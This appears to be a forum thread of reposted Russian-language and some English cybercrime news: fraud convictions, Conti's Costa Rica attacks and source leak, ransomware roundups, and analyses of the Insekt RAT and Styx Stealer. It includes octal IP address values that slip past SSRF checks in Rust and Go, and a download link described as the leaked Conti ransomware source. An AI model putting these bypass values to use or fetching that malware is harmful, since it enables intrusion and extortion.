Министерство юстиции США осудило гражданина Нигерии за участие в мошенничестве с компрометацией деловой электронной почтой (BEC-атака), ущерб от которого составил $1,5 млн.
Эбука Рафаэль Умети, возрастом 35 лет, вместе с двумя предполагаемыми сообщниками использовал социальную инженерию и вредоносное ПО для реализации мошеннической схемы.
BEC-мошенничество предполагает использование фишинговых писем и обманных действий для получения денег или ценных данных от бизнеса и организаций. По данным Министерства юстиции, Умети начал заниматься этим видом мошенничества в феврале 2016 года, когда один из его сообщников, нигериец Франклин Ифеаничукву Оквонна, прислал ему шаблон фишингового письма.
С 2018 года мошенники начали получать крупные суммы: $571 000 от оптового поставщика из Нью-Йорка и $400 000 от производителя металла из Техаса. В последующие годы преступники стали использовать подделку доменов, подключаться к VoIP-номерам и общаться через платформу Discord, предназначенную для геймеров.
Мошенники также начали отправлять электронные письма с внедрённым вредоносным ПО, что позволило им получать удалённый доступ к скомпрометированным компьютерам.
Использование этого метода, вероятно, привёл к тому, что позже к ним присоединился ещё один участник — гражданин Саудовской Аравии Мохаммед Наджи Мохаммедали Бутаиш, который пока не был осужден. Согласно обвинению Министерства юстиции, Бутаиш начал сотрудничество с нигерийцами в 2020 году, разрабатывая новое вредоносное ПО для Умети и Оквонны.
В 2021 году троица мошенников начала использовать вредоносное ПО, разработанное Бутаишем, который, как утверждают в ФБР, продавал его как своим сообщникам, так и другим заинтересованным лицам.
Хотя обвинения против всех троих были выдвинуты ещё в августе 2022 года, Умети и Оквонну арестовали только в январе этого года. Задержка была связана с тем, что они проживали в Нигерии, но наличие договора об экстрадиции с США не позволило им избежать судебного преследования.
В то же время, судебные документы указывают, что Бутаиш пока не арестован, и поскольку Саудовская Аравия не имеет договора об экстрадиции с США, неизвестно, будет ли он привлечён к суду вообще.
Суд над Умети завершился вчера, и присяжные признали его виновным по всем пунктам обвинения; Оквонна был признан виновным 20 мая. Их финальные приговоры будут вынесены 27 августа и 3 сентября соответственно. Умети грозит максимальный срок заключения до 102 лет, но из-за сложности федеральных норм приговор вряд ли будет столь суровым.
• Source: justice[.]gov/usao-edva/pr/foreign-national-convicted-participation- business-email-compromise-scheme
Пресс-служба МВД РФ сообщила о проводимых следственных мероприятиях в
отношении российских граждан по делу о краже государственных средств
администрации малого бизнеса США. К сотрудничеству с Интерполом привлечены
службы МВД и ФСБ в 19 областях страны.
В России сотрудники Интерпола начали тесное сотрудничество с региональными
органами правопорядка. В данный момент известно, что следствие продолжается
дольше двух месяцев, однако число подозреваемых уже идет на сотни. В новейшей
истории страны это самое крупное и масштабное следствие, проводимое совместно
и в содействии с сотрудниками полиции и органов безопасности США.
Российские киберпреступники использовали поддельные документы граждан США,
чтобы получить кредит по программе поддержки малого бизнеса. Сумма ущерба
составляет более 1 миллиарда долларов США. Известно о том, что активная работа
ведется во многих крупных регионах страны: Московская, Ленинградская,
Ростовская, Челябинская области, Республика Дагестан, Татарстан и Чеченская
республика, а также Волгоградская, Саратовская, Оренбургская, Белгородская,
Владимирская, Ивановская, Курская, Рязанская, Ярославская и Тверская области,
Краснодарский и Хабаровский край. К сотрудничеству с Интерполом привлечены
сотрудники МДВ и ФСБ.
Федеральная полиция Аргентины арестовала в Буэнос-Айресе 29-летнего гражданина РФ по обвинению в отмывании криптовалют для различных преступников, включая северокорейских хакеров Lazarus. В идентификации злоумышленника помогала аналитическая фирма TRM Labs.
По информации La Nacion, обвиняемый отмывал средства через криптовалютные биржи и миксеры, а затем конвертировал активы в фиат. В его квартиру ежедневно приходили люди с сумками.
Среди прочего через россиянина прошла часть из $100 млн, похищенных у кроссчейн-моста Horizon хакерами Lazarus летом 2022 года.
Следствие установило, что по состоянию на 18 декабря 2023 года фигурант приобрел более 1,3 млн USDT за российские рубли и осуществил 2463 криптовалютных перевода через Binance Pay на общую сумму свыше $4,5 млн.
Слежка за ним велась с ноября 2023 года. Злоумышленник менял квартиры каждый месяц. Установить его последнее местоположение помогла информация, предоставленная биржей Binance.
Из квартиры изъяли все электронные устройства, два криптовалютных кошелька с активами на $121 000, а также $15 млн наличными.
• Source: https://www.trmlabs[.]com/post/argentinian-authorities-arrest- russian-national-for-laundering-the-crypto-proceeds-of-illicit-activity
• Source: https://www.lanacion[.]com.ar/seguridad/investigacion-del-fbi-la- ruta-de-una-ciberestafa-de-norcoreanos-que-termino-en-el-departamento-de-un- nid21082024/
Харьковской областной прокуратурой утвержден и направлен в суд обвинительный акт в отношении трех членов организованной группы по фактам несанкционированного вмешательства в работу электронной коммуникационной системы, что привело к утечке информации, а также несанкционированного сбыта информации с ограниченным доступом (ч. 5 ст. 361, ч. 3 ст. 28 ч. 5 ст. 361, ч. 2 ст. 361-2, ч. 3 ст. 28 ч. 2 ст. 361-2 УК Украины).
По данным следствия, в апреле прошлого года 32-летний житель Кировоградской области разработал схему «заработка» на взломе аккаунтов пользователей соцсетей, в частности Instagram. К своему плану он привлек других исполнителей
Используя специальное программное обеспечение, злоумышленники получали доступ к учетным записям пользователей. Взломанные аккаунты обвиняемые продавали в даркнете, преимущественно другим мошенническим группировкам, которые использовали их в своей противоправной деятельности.
В ходе обысков, проведенных по местам проживания и регистрации дельцов, обнаружена и изъята компьютерная техника, мобильные телефоны с доказательствами противоправной деятельности, а также денежные средства.
Обвиняемых будут судить в Киевском районном суде г. Харькова. За содеянное мужчинам грозит до пятнадцати лет лишения свободы с лишением права занимать определенные должности или заниматься определенной деятельностью на срок до трех лет.
Досудебное расследование проводили следователи СУ ГУНП в Харьковской области при оперативном сопровождении Департамента киберполиции Национальной полиции Украины.
khar.gp.gov.ua/ua/news.html?_m=publications&_c=view&_t=rec&id=367034
С трудом вспоминается, но так и не вспомнится никак, когда после кибератак на территории целого государства вводилось бы чрезвычайное положение.
Но именно такая ситуация сложилась в Коста-Рике, руководитель которой Родриго Чавес ввел режим ЧП после кибератак вымогателей Conti на объекты в госсекторе. Это случилось сразу после вступления им в должность Президента 8 мая, ранее Чавес занимал пост министра финансов.
Следуя тактике двойного вымогательства, хакеры слили большую часть украденных данных, представленных на DLS. В паблике оказалось 97% дампа объемом 672 ГБ, который содержит данные, принадлежащие правительственным учреждениям Коста- Рики. Утечка последовала после отказа правительства Коста-Рики выплатить выкуп в размере 10 миллионов долларов.
В числе жертв: Министерства финансов, труда и социальной защиты, науки, инноваций, технологий и связи, Национальный метеорологический институт, Коста- риканский фонд соцобеспечения, Фонд соцразвития и семейных пособий, Административный совет электротехнической службы провинции Картаго и Межвузовская штаб-квартира Алахуэлы.
Анализ представленных Conti данных не оставляет сомнений в подлинности образцов исходного кода и базы данных SQL.
Официально на такой шаг вновь избранного президента подтолкнули непрекращающиеся уже на протяжении месяца атаки с использованием ransomware, которые затрагивает производственный сектор и цифровые услуги Минфина.
Но учитывая, что первой жертвой вымогателей как раз и стало ранее подшефное новому главе ведомство, можно предположить, что причинами ЧП могли стать вовсе не атаки, а скорее последствия утечки информации, прежде всего, финансовой. Или же смутить могли угрозы операторов Conti провести более серьезные атаки.
Но, на нашей памяти, пожалуй, это первый случай реагирования на атаку в масштабе целого государства.
source: twitter.com/ameliarueda/status/1523402545372143616
Человек, ранее опубликовавший логи чатов хак-группы Conti за последний год, обнародовал исходный код шифровальщика, панелей управления и новые логи чатов.
Напомню, что слив данных начался после того, как лидеры группировки объявили о «полной поддержке российского правительства» и пригрозили ответными кибератаками любому, кто атакует Россию, обещая использовать все свои ресурсы, «чтобы нанести ответный удар по критически важным инфраструктурам врага».
Чуть позже лидеры группы скорректировали свое заявление, отметив, что при этом они «не вступают в союз ни с одним правительством, и осуждают продолжающуюся войну», но, похоже, было уже поздно. Дело в том, что в отместку неизвестный (по разным данным, это был либо украинский ИБ-эксперт, имевший доступ к инфраструктуре хакеров, либо украинский участник самой хак-группы) слил в открытый доступ внутренние чаты Conti.
Утечка представляет собой 339 файлов JSON, каждый из которых — это лог за отдельно взятый день. То есть были слиты все разговоры хакеров с 29 января 2021 года по 27 февраля 2022 года (в общей сложности 60 694 сообщения).
Теперь этот же человек (ContiLeaks в Twitter) обнародовал еще 148 файлов JSON, содержащих 107 000 внутренних сообщений группировки, то есть новые логи, самые ранние из которых датированы июнем 2020 года, когда Conti только начала свою активность.
Также ContiLeaks начал публиковать и другие данные, связанные с Conti, в том числе исходный код панелей управления, API BazarBackdoor, скриншоты серверов и многое другое.
Также утечка содержит защищенный паролем архив с исходными кодами одноименного шифровальщика, дешифратора и билдера. Хотя автор утечки не разглашал пароль от архива, его вскоре взломал ИБ-исследователь, предоставив общественности доступ к исходному коду малвари.
[](https://xakep.ru/wp- content/uploads/2022/03/375056/conti-source-code.jpg)
Издание Bleeping Computer отмечет, что эта утечка определенно порадует ИБ- экспертов, однако публичная доступность исходников малвари имеет и свои минусы. К примеру, ранее, когда были опубликованы исходные коды вымогателей HiddenTear («в образовательных и исследовательских целях») и [Babuk](https://xakep.ru/2021/09/06/babuk- source/), другие злоумышленники[ быстро ](https://xakep.ru/2016/02/05/hidden- tear-family/)адаптировали исходники для своих нужд и использовали малварь для собственных операций. К сожалению, можно ожидать, что Conti не станет исключением.
По мнению журналистов и исследователей, в итоге более полезными могут
оказаться исходные коды API-интерфейсов BazarBackdoor и управляющих серверов
TrickBot, поскольку получить доступ к этой информации, не имея доступа к
инфраструктуре злоумышленников, ранее было невозможно.
https://anonfiles.com/l3b7n7L6xc/conti_locker_7z (на подлинность не
проверял)
источник:хакер
Его обвиняют в 20 эпизодах мошенничества с инвестициями в букмекерские конторы.
Бабушкинский суд арестовал до 3 мая блогера Хизри Запирова по обвинению в 20 эпизодах мошенничества с инвестициями в букмекерские конторы. Об этом сообщает прокуратура Москвы в Telegram-канале.
"С учетом позиции прокуратуры Бабушкинский районный суд удовлетворил ходатайство следствия и избрал в отношении 27-летнего обвиняемого меру пресечения в виде заключения под стражу на срок по 3 мая", - сообщает надзорное ведомство.
По версии следствия, обвиняемый с соучастниками в интернете рекламировал систему инвестирования, позволяющую получить крупный заработок и приумножить капитал. Инвестиции должны были поступать в букмекерские конторы путем автоматического распределения ставок, но вместо этого переводились на счета третьих лиц, с которых впоследствии обналичивались. Один из фигурантов арестован, другой находится под домашнем арестом, а третий отпущен по подписку о невыезде. Еще одна обвиняемая находится в международном розыске. Запирову предъявлено обвинение в совершении 20 эпизодов мошенничества. Ход расследования контролируется прокуратурой Москвы.
В конце января МВД России объявило в федеральный розыск по уголовной статье Запирова, у которого почти 8 млн подписчиков в Instagram (запрещен в РФ; принадлежит корпорации Meta, которая признана в РФ экстремистской). Кроме того, в базе розыска МВД находится PR-директор блогера Лусик Карапетян. Она также разыскивается по уголовной статье. Женщина сообщила, что находится уже более восьми месяцев на лечении в Германии и впервые слышит о ситуации. Полиция 30 марта задержала Запирова.
source: tass.ru/proisshestviya/14254823
Федеральный судья штата Флорида признал признал трех мужчин из городка Кейп- Корал виновными в создании и реализации крупномасштабной мошеннической схемы с кредитными картами. Журналисты Fox 4 выяснили, что речь идет о нескольких членах группировки кардеров, состоявшей из девяти человек.
Руководили действиями мошенников отец и сын — Карлос Техеда (Carlos Tejeda) и Хуан Техеда (Juan Tejeda), третьим осужденным оказался Педро Пелаес (Pedro Pelaez). Свои преступления они совершали в период с 2015-го по 2018 год. Каждый из двух руководителей группировки были осуждены за 44 федеральных преступления, среди которых были мошенничество с использованием электронных средств, кража личных данных и заговор с целью отмывания денег. Обвинительный список Пелаеса состоял лишь из 11 пунктов.
Таким образом, суд счел доказанным, что Техеда-старший нанял нескольких друзей и соратников, в том числе Пелаеса, для создания подставных компаний и получения терминалов для обработки кредитных карт. Обналичивать поддельный пластик он просил Техеду-младшего.
Журналисты уточняют, что остальные шесть членов группировки были осуждены раньше. Точные сроки тюремного заключения суд штата Флорида объявит позже.
source: justice[.]gov/usao-mdfl/pr/cape-coral-trio-convicted-their-roles- multi-million-dollar-credit-card-fraud-scheme
Для мониторинга подозрительных транзакций с криптовалютами власти будут использовать специальное оборудование.
В России начали использовать специальное программное обеспечение для пресечения криминального использования криптовалют, сообщил генеральный прокурор РФ Игорь Краснов на пленарном заседании совещания прокуроров стран БРИКС.
Не меньшее беспокойство вызывает рост числа преступлений, связанных с криминальным оборотом криптовалют и иных виртуальных активов. Для их пресечения в нашей стране разработано специальное программное обеспечение. Оно используется как для финансового мониторинга, так и для расследования уголовных дел.
Click to expand...
Количество судебных дел, связанных с криптовалютой, в России выросло в пять раз за последние два года — до 2653 в 2023 году.
Более половины (62%) всех разбирательств в 2023 году были связаны со спорами о банкротстве. Количество гражданских дел увеличилось на 60%, уголовных дел — на 34%, также возросло число административных дел — на 19%.
Активность российских пользователей на рынке криптоактивов выросла, сообщается в отчете Банка России о финансовой стабильности за четвертый квартал 2023-го — первый квартал 2024 года.
По данным отчета, за два квартала совокупный веб-трафик российских пользователей на сайтах крупнейших криптобирж, p2p-площадок и обменников увеличился на 16% по сравнению со вторым и третьим кварталами 2023 года.
По оценке банка, объем операций с криптовалютами, потенциально приходящийся на россиян, за тот же период вырос до 4,5 трлн руб.
В стандартных библиотеках языков Rust и Go выявлены уязвимости, связанные с некорректной обработкой IP-адресов с восьмиричными цифрами в функциях разбора адреса. Уязвимости позволяют обойти проверки допустимых адресов в приложениях, например, для организации обращения к адресам loopback-интерфейса (127.x.x.x) или интранет-подсетям при совершении атак SSRF (Server-side request forgery). Уязвимости продолжают цикл проблем, ранее выявленных в библиотеках node- netmask (JavaScript, CVE-2021-28918, CVE-2021-29418), private-ip (JavaScript, CVE-2020-28360), ipaddress (Python, CVE-2021-29921), Data::Validate::IP (Perl, CVE-2021-29662) и Net::Netmask (Perl, CVE-2021-29424).
В соответствии со спецификацией строковые значения IP-адресов, начинающиеся с нуля, должны интерпретироваться как восьмеричные числа, но многие библиотеки не учитывает данную особенность и просто отбрасывают ноль, обрабатывая значение как десятичное число. Например, число 0177 в восьмеричной системе равно 127 в десятичной. Атакующий может запросить ресурс, указав значение "0177.0.0.1", которое в десятичном представлении соответствует "127.0.0.1". В случае использования проблемной библиотеки, приложение не определит вхождение адреса 0177.0.0.1 в подсеть 127.0.0.1/8, но фактически при отправке запроса может выполнить обращение к адресу "0177.0.0.1", который сетевые функции обработают как 127.0.0.1. Похожим образом можно обмануть и проверку обращения к интранет-адресам, указав значения подобные "012.0.0.1" (эквивалент "10.0.0.1").
В Rust проблеме оказалась подвержена стандартная библиотека "std::net" (CVE-2021-29922). Парсер IP-адресов данной библиотеки отбрасывал ноль перед значениями в адресе, но только если указано не более трёх цифр, например, "0177.0.0.1" будет воспринято как недопустимое значение, а в ответ на 010.8.8.8 и 127.0.026.1 будет возвращён неверный результат. Приложения, использующие std::net::IpAddr при разборе указанных пользователем адресов потенциально подвержены атакам SSRF (Server-side request forgery), RFI (Remote File Inclusion) и LFI (Local File Inclusion). Уязвимость устранена в ветке Rust 1.53.0.
В языке Go проблеме подвержена стандартная библиотека "net" (CVE-2021-29923). Встроенная функция net.ParseCIDR пропускает нули перед восьмеричными числами, вместо из обработки. Например, атакующий может передать значение 00000177.0.0.1, которое при проверке в функции net.ParseCIDR(00000177.0.0.1/24) будет разобрано как 177.0.0.1/24, а не 127.0.0.1/24. Проблема в том числе проявляется в платформе Kubernetes. Уязвимость устранена в выпуске Go 1.16.3 и бета-версии 1.17.
https://sick.codes/sick-2021-016/
https://sick.codes/sick-2021-015/
While the beginning of this week was fairly quiet, it definitely ended with a bang as news came out of the largest ransom demand yet.
It was revealed at the end of the week that computer maker Acer suffered a REvil ransomware attack where the threat actors are demanding a massive $50,000,000 ransom.
REvil also made this news this week with the addition of a new -smode argument that causes Windows to reboot into Safe Mode with Networking to perform the encryption. REvil's 'Unknown' also [conducted an interview](https://therecord.media/i-scrounged-through-the-trash-heaps-now-im- a-millionaire-an-interview-with-revils-unknown/) with TheRecord.
Finally, we saw an FBI warning about PYSA and new variants of ransomware families released.
Contributors and those who provided new ransomware information and stories this week include: @malwareforme, @struppigel, @LawrenceAbrams, @Seifreed, @DanielGallagher, @VK_Intel, @fwosar, @malwrhunterteam, @FourOctets, @demonslay335, @BleepinComputer, @serghei, @jorntvdw, @Ionut_Ilascu, @PolarToffee, @Amigo_A_, @GrujaRS, @ddd1ms, @campuscodi, @ValeryMarchive, @3xp0rtblog, @Kangxiaopao, and @fbgwls245.
variant](https://twitter.com/GrujaRS/status/1370748367693840384)
GrujaRSA found a new variant of the RunExeMemory that appends the .z8sj2c extension and drops a ransom note named Read me, if you want to recover your files.txt.
The Federal Bureau of Investigation (FBI) Cyber Division has warned system administrators and cybersecurity professionals of increased Pysa ransomware activity targeting educational institutions.
through-the-trash-heaps-now-im-a-millionaire-an-interview-with-revils- unknown/)
Unknown talked to Recorded Future expert threat intelligence analyst Dmitry Smilyanets recently about using ransomware as a weapon, staying out of politics, experimenting with new tactics, and much more. The interview was conducted in Russian and translated to English with the help of a professional translator, and has been edited for clarity.
variant](https://twitter.com/JakubKroustek/status/1371966419248816129)
Jakub Kroustek found a new Dharma Ransomware variant that appends the .liz extension.
variant](https://twitter.com/fbgwls245/status/1371982321851662337)
dnwls0719 found a new Rapid ransomware variant that appends the .lock extension.
variant](https://twitter.com/Kangxiaopao/status/1371779576020430852)
xiaopao found a new variant of the SFile ransomware that appends the .sandboxtest extension.
decryptions](https://therecord.media/missed-opportunity-bug-in-lockbit- ransomware-allowed-free-decryptions/)
A member of the cybercriminal community has discovered and disclosed a bug in the LockBit ransomware that could have been used for free decryptions.
variant](https://twitter.com/Kangxiaopao/status/1372144791719342082)
xiaopao found a new variant of the SFile ransomware that appends the .PROM extension.
variant](https://twitter.com/Kangxiaopao/status/1372152354020093955)
xiaopao found a new variant of the SFile ransomware that appends the .zuadr extension and drops a ransom note named RESTORE_FILES_INFO.hta and RESTORE_FILES_INFO.txt.
variant](https://twitter.com/siri_urz/status/1372577123907559426)
Amigo-A found a new PewPew Ransomware variant that calls itself 'Artemis' and appends the .optimus extension to encrypted files.
variant](https://twitter.com/fbgwls245/status/1372573018581389317)
dnwls0719 found a new STOP Djvu ransomware variant that appends the .enfp and drops a ransom note named _readme.txt.

The REvil ransomware operation has added a new ability to encrypt files in Windows Safe Mode, likely to evade detection by security software and for greater success when encrypting files.
Electronics giant Acer has been hit by a REvil ransomware attack where the threat actors are demanding the largest known ransom to date, $50,000,000.
Acer](https://www.lemagit.fr/actualites/252498175/Cyberattaque-une-rancon- de-50-millions-de-dollars-demandee-a-Acer)
Les opérateurs du rançongiciel Revil, aussi connu sous le nom Sodinokibi, ont ajouté le constructeur à la liste de victimes. Ils laissent encore près de 9 jours à Acer pour négocier, faute de quoi ils doubleront leurs exigences.
summary](https://blog.emsisoft.com/en/38259/ransomware-statistics- for-2020-year-in-summary/)
2020, the year of the pandemic, was another lucrative year for ransomware. As nations around the world scrambled to slow the spread of the virus, cybercriminals attempted to capitalize on the chaos.
variant](https://twitter.com/Kangxiaopao/status/1372840741802635265)
xiaopao found a new variant of the SFile ransomware that appends the .Technomous-zbtrqyd extension.
Эксперты Cisco Talos опубликовали результаты анализа набора инструментов атаки, обнаруженного на веб-сервере Apache (в настоящее время неактивен). Тулкит, или фреймворк, как его называют исследователи, содержит нового трояна удаленного доступа Insekt, программу Alchimist, реализующую функции C2, и множество инструментов, пригодных для продвижения по сети после взлома.
И Alchimist, и работающий в памяти Insekt [написаны](https://blog.talosintelligence.com/2022/10/alchimist-offensive- framework.html) на Go, что позволяет операторам атаковать разные платформы — Windows, Linux, macOS. Из более безобидных инструментов на сервере найдены PsExec, NetCat, сканер интранета fscan и обратный прокси frp, который можно использовать для вывода данных.
Компонент Alchimist представляет собой 64-битное приложение для Linux с ресурсами для веб-интерфейса и Insekt RAT в Windows- и Linux-версиях. Примечательно, что Web UI использует упрощенный китайский язык.
Набор функций Alchimist позволяет оператору генерировать полезную нагрузку нужной конфигурации, открывать сессии удаленного доступа, раздавать пейлоад на целевые машины, выполнять произвольные команды, шелл-код и получать скриншоты. Механизмы заражения при этом можно кастомизировать — создавать фрагменты кода PowerShell (для Windows) или wget (для Linux) для развертывания RAT.
Настройки, задаваемые полезной нагрузке при ее создании, включают такие параметры, как IP-адрес или URL командного сервера, атакуемая платформа (Windows или Linux), протокол передачи данных (TLS, SNI, WSS/WS) и режим работы — основной или фоновый (как демон).
Адрес C2 вшивается в код трояна вместе с самоподписанным сертификатом, создаваемым во время компиляции. Предусмотрен также 10-кратный пинг с секундным интервалом (то есть резидентный бэкдор должен работать как маячок); при отсутствии отклика попытки подключиться возобновляются через час.
Основное назначение 64-битного Insekt — обеспечение удаленного администрирования; его возможности разнообразны и предоставляют оператору широкий выбор. В ходе инициализации зловредный имплант устанавливает множество обработчиков для основных функций:
фиксации размеров файлов;
сбора данных ОС;
выполнения произвольных команд с помощью cmd.exe или bash;
самообновления;
выполнения команд от имени другого пользователя;
ухода в сон на заданный период;
активации/деактивации снимков экрана.
Затем вредонос проверяет наличие интернет-связи и статус нужных портов, выполняя подключение с перебором небольшого списка адресов и номеров.
Троян также может работать как прокси (SOCKS5), манипулировать SSH-ключами, сканировать порты и IP, записывать или распаковывать файлы на диск, выполнять на хосте шелл-код. Так, аналитики обнаружили, что Linux-версия Insekt умеет перечислять содержимое папки .ssh в домашнем каталоге пользователя и добавлять новые SSH-ключи в файл authorised_Keys, обеспечивая оператору альтернативный канал связи с зараженной машиной.
Из команд, которые можно задать изначально (в настройках) замечены создание нового пользователя или административной группы, листинг пользователей/админов/контроллеров домена, включение службы терминалов, отключение файрвола либо внесение изменений в правила, чтобы разрешить входящие соединения на определенном TCP-порту.
На macOS-компьютерах зловред пока не работает, хотя на сервере с тулкитом был обнаружен файл Mach-O — написанный на Go 64-битный дроппер со встроенным эксплойтом CVE-2021-4034 и бэкдором, работающим по схеме bind shell. Как оказалось, вредоносная атака в этом случае невозможна из-за отсутствия утилиты pkexec; на Linux-машинах, где она есть, тот же эксплойт с успехом отрабатывает.
Российская биржа beribit.com не дает клиентам вывести
средства и публикует персональные данные в своем тг канале
https://t.me/BeribitNews/594 ,
еще и сумму рядом указывает. Отечественными банками и биржами не пользуемся))
Как обычно наебали всех. Аналогичная ситуация с Qiwi.
В Канаде арестован мужчина, подозреваемый в серии взломов, связанных с системой Snowflake в этом году
Эта новость последовала за несколькими месяцами крупных утечек данных, включая инциденты с AT &T, Ticketmaster и LendingTree. Хакер, известный под псевдонимами Judische и Waifu, причастен к более чем 165 взломам систем Snowflake. Арест произошел после того, как журналисты сообщили, что киберисследователи собрали ценные данные о подозреваемом и сотрудничали с международными правоохранительными органами.
Сообщения, отправленные журналистами Judische за последнюю неделю, остались непрочитанными; последнее общение с ним состоялось 27 октября. В середине октября Judische признался журналистам, что опасается ареста. «Я уничтожил много доказательств и замаскировал то, что невозможно было уничтожить. Если это произойдет, это будет считаться сговором, от которого я смогу откупиться и победить», — заявил он.
Хакер обычно использовал данные, собранные через инфостилеры, чтобы получить
доступ к аккаунтам клиентов Snowflake — платформы для хранения данных, которую
используют крупные компании. Judische часто пытался шантажировать компании
и, в случае отказа, публиковал украденные данные.
Ранее исследователи высказывали предположение, что Judische находится в
Канаде. Когда начали появляться слухи о возможном аресте Judische, источник
сообщил журналистам, что настоящее имя подозреваемого — Коннор Моука.
Журналисты затем проверили систему канадских судебных записей и нашли там
информацию о предстоящих слушаниях по делу с таким именем. Другой источник,
знакомый с деятельностью хакера, подтвердил, что это действительно
предполагаемый взломщик Snowflake.
После первоначального отказа от комментариев Министерство юстиции Канады отправило журналистам письмо, подтвердив: «Можем подтвердить, что, по запросу Соединенных Штатов, Александр Моука (он же Коннор Моука) был арестован по временной ордеру на арест в среду, 30 октября 2024 года. Позже в тот же день он предстал перед судом, а его дело было перенесено на вторник, 5 ноября 2024 года».
До ареста Judische начал рассказывать журналистам свою историю становления и входа в криминальную хакерскую экосистему под названием The Com. Это сообщество, преимущественно состоящее из молодых англоговорящих хакеров, стояло за некоторыми из самых значительных взломов последних лет. Участники «The Com» также стали первооткрывателями нового вида преступности, который сочетает физические и цифровые атаки, а иногда и прибегает к насилию для захвата доступа к аккаунтам или похищения средств у соперников.
Королевская канадская конная полиция (RCMP) и ФБР отказались от комментариев.
Из сегодняшнего суда уже появились новости и стало известно следующее:
Во вторник Коннор Моука, предполагаемый хакер по прозвищу Judische и Waifu
, подозреваемый во взломе AT&T, Ticketmaster и ряда других компаний в этом
году, предстал перед канадским судом без адвоката в рамках процесса его
экстрадиции в США.
Моука подключился к слушанию удалённо из тюрьмы, и с легким канадским акцентом пояснил, что пока не смог найти адвоката, так как тюрьма часто находилась на локдауне.
«Алло? Алло?» — обратился Моука перед началом заседания. «В тюрьме часто локдаун, и мне удалось позвонить только пару раз [...] Скоро, думаю, у меня появится адвокат» , добавил он.
Один из присутствующих юристов упомянул, что с ним связалась семья Моуки с предложением представлять его интересы. После короткой паузы пара вернулась в зал заседаний и сообщила, что Моука подал заявление на получение юридической помощи.
Когда судья в конце спросил, есть ли что добавить, Моука ответил: «Больше ничего».
Аналитики [Check Point](https://research.checkpoint.com/2024/unmasking-styx- stealer-how-a-hackers-slip-led-to-an-intelligence-treasure-trove/) заметили, что создатель нового инфостилера Styx Stealer случайно скомпрометировал собственный компьютер и слил в сеть свои данные, включая информацию о клиентах и прибылях, а также никнеймы, номера телефонов и адреса электронной почты.
Styx Stealer, появившийся в апреле 2024 года, представляет собой вариацию стилера [Phemedrone](https://xakep.ru/2024/01/16/phemedrone-windows- smartscreen/) и способен похищать данные из браузеров, сессии Telegram и Discord, а также информацию о криптовалютных кошельках жертв.
«Вероятнее всего, Styx Stealer основан на исходном коде старой версии Phemedrone Stealer, в которой отсутствуют некоторые функции, присутствующие в более свежих версиях, например, отправка отчетов в Telegram, шифрование отчетов и многое другое, — рассказывают исследователи. — Однако создатель Styx Stealer добавил несколько собственных функций: автозапуск, монитор буфера обмена и криптоклиппер, дополнительные методы обхода песочницы и антианализа, а также заново реализовал передачу данных в Telegram».
Click to expand...
Styx Stealer распространялся через собственный сайт (styxcrypter[.]com), и
«лицензия» на малварь стоит 75 долларов в месяц, 230 долларов за три месяца,
или 350 долларов за пожизненную подписку.

Судя по хакерским форумам, этот вредонос связан со злоумышленником из Турции
под ником STY1X. При этом эксперты Check Point заявили, что в марте 2024 года
им удалось обнаружить связь между STY1X и спам-кампанией, направленной на
различные цели в Китае, Индии, Филиппинах и ОАЭ, в рамках которой
распространялась малварь Agent Tesla. Эту активность Agent Tesla исследователи
приписывают злоумышленнику под ником FucosReal, который предположительно
находится в Нигерии.
Исследователи объясняют, что STY1X допустил ошибку и произвел отладку Styx
Stealer на своей собственной машине, используя токен для Telegram-бота,
предоставленный FucosReal.
Этот просчет злоумышленника позволил исследователям идентифицировать 54
клиентов хакера и восемь криптовалютных кошельков, вероятно, принадлежащих
STY1X и использовавшихся для получения платежей. Также создатель Styx Stealer
раскрыл свои личные данные, включая учетные записи Telegram, электронную почту
и другие контакты.

Данные STY1X и FucosReal
«Эта кампания была примечательна тем, что использовала API Telegram-бота для слива данных и инфраструктуру Telegram вместо традиционных управляющих серверов, которые легче обнаружить и заблокировать, — говорят в Check Point. — Однако у этого метода есть существенный недостаток: каждый образец малвари должен содержать токен бота для аутентификации. Расшифровка вредоносной программы для извлечения этого токена открывает доступ ко всем данным, отправленным через бота, что приводит к раскрытию учетной записи получателя. Разработчик допустил фатальную ошибку и слил данные с собственного компьютера, что позволило Check Point получить большой объем данных».
Click to expand...
40-летнему Сергею из Белоруссии позвонила женщина, которая назвала себя "работником оперативной службы ФСБ" и заявила, что его разводит банк. Остановить это можно, если перевести всё, что есть, на "безопасный счёт". Мужчина тут же рванул в Москву и начал бегать по банкам. Сначала он продал акции на 700 тысяч рублей, а после дополнительно снял ещё 300k. Все деньги он перевёл на указанный счёт.
Через некоторое время ему вновь позвонили и раскрыли все карты: никакого мошенничества с банком не было, а мужчину просто развели. Он уехал обратно в Белоруссию. Проводится проверка.
Вадим Галыгин сравнил русских хакеров за рубежом с защищающими родину гусарами.
Российский актер и телеведущий Вадим Галыгин выступил в поддержку работающих за рубежом русских хакеров и сравнил их с гусарами. О своем отношении к ним звезда высказалась в интервью изданию Life.
Галыгин рассказал, что косвенно знаком с гражданами России, которые за рубежом выступают за свою страну в киберпространстве. Их поступки он сравнил с деятельностью гусаров, которые защищали родину.
«Мне доводилось слышать истории про людей, про знакомых моих знакомых, которые имели отношение к каким-то таким делам. Причем за рубежом. И они правда там не очень хороших людей нахлобучивали», – сказал Галыгин.
Life пишет, что самоотверженность русских хакеров так вдохновила Галыгина, что он решил выступить продюсером сериала про них — «Короче, план такой».
«Участники команды «русских хакеров» никогда не виделись в жизни и знают друг друга только по никам. Они успешно потрошили электронные кошельки богачей, пока не совершили ошибку и попались. Ребята знакомятся лично, и им предстоит выбор: сесть за решетку или работать в интересах страны. Хакеры выбирают второе, и с этого момента жизнь их меняется», – гласит синопсис проекта.

Эксперты [ThreatFabric](https://www.threatfabric.com/blogs/zombinder-ermac-
and-desktop-stealers.html) рассказали о платформе Zombinder, которая набирает
популярность в даркнете. Zombinder помогает осуществить привязку малвари к
легитимным приложениям для Android, а создатели сервиса утверждают, что
полученные вредоносные приложения невозможно обнаружить.
Все началось с того, что специалисты заметили новую вредоносную кампанию, направленную на пользователей Windows и Android, и распространяющую сразу несколько семейств малвари, включая стилеры Erbium и Aurora, клипер Laplas и банкер Ermac.
Заражения осуществляются через сайты, замаскированные под порталы авторизации Wi-Fi, которые якобы помогают пользователям подключиться к точкам доступа.
[](https://xakep.ru/wp- content/uploads/2022/12/409196/wifi-site.jpg)
Такие сайты предлагают жертвам загрузить приложение для Windows или Android, якобы необходимое для продолжения работы, а на самом деле распространяют разную малварь. По данным исследователей, от этой кампании уже пострадали тысячи пользователей, и только стилер Erbium сумел похитить данные с 1300 отдельных машин.
